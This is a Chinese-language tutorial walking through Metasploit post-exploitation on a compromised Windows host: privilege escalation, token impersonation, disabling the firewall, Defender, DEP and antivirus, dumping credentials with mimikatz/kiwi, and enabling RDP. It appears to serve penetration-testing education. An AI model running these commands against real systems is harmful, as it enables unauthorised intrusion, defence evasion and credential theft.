一、信息收集
当我们的msf普通权限成功连接后,如图:
shell进入命令行模式:
存在中文乱码,chcp 65001将编码格式改为utf-8:
将systeminfo信息输出到文档info.txt:
exit退出当前终端。
下载systeminfo信息 download c:\users\root\Desktop\info1.txt /mnt/hgfs/share/info1.txt:
将syteminfo信息通过工具筛选可能存在的提权漏洞。
如疑似存在漏洞ms16-075。将当前会话放置 后台background,查看后台会话:
search ms16-075,搜索漏洞利用模块:
use 1,使用模块,info查看漏洞信息
options查看配置。最后run执行,发现执行出错,网上找一些好的payload上传
Getuid 查看当前权限
Getsystem 自动化提升
先进入会话 sessions -i n
上传本地恶意文件到目标机器 ,尽量不要直接上传到C盘根目录会报错。
list_tokens -u //列出当前存在的令牌
execute -cH -f C:/users/root/rottenpotato.exe 创建新进程
impersonate_token “NT AUTHORITY\SYSTEM” //模仿windows system令牌,有时候一次不会成功,多试几次
最终提权失败。
使用模块:use multi/recon/local_exploit_suggester 来识别当前系统中可用的exp
检测出几个可能利用的漏洞逐一尝试。
提权成功后即为system权限。
到system权限后总思路为远程,首先使用猕猴桃将密码读出,然后打开3389端口
首先关杀软:
关闭防火墙: netsh advfirewall set allprofiles state off 关闭Denfender: net stop windefend 关闭DEP: bcdedit.exe/set{current}nx alwaysoff 关闭杀毒软件: run killav run post/windows/manage/killava
运行load mimikatz,版本msf6中,mimikatz被kiwi模块合并了。
查看kiwi的使用指南:help kiwi
三步走:列举所有凭据:creds_all
列举所有kerberos凭据:creds_kerberos
调用kiwi_cmd执行mimikatz命令:kiwi_cmd sekurlsa::logonpasswords
Kiwi的使用,发现执行命令没有结果或报错。
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process。这是因为你上传的是X86的吗,需要迁移进程到x64的
使用命令:getuid查看当前进程号
然后ps查看所有进程,找到适合迁移的进程,且为system权限。
使用命令:migrate 7240迁移进程到其他id
最后的打开3389端口:run post/windows/manage/enable_rdp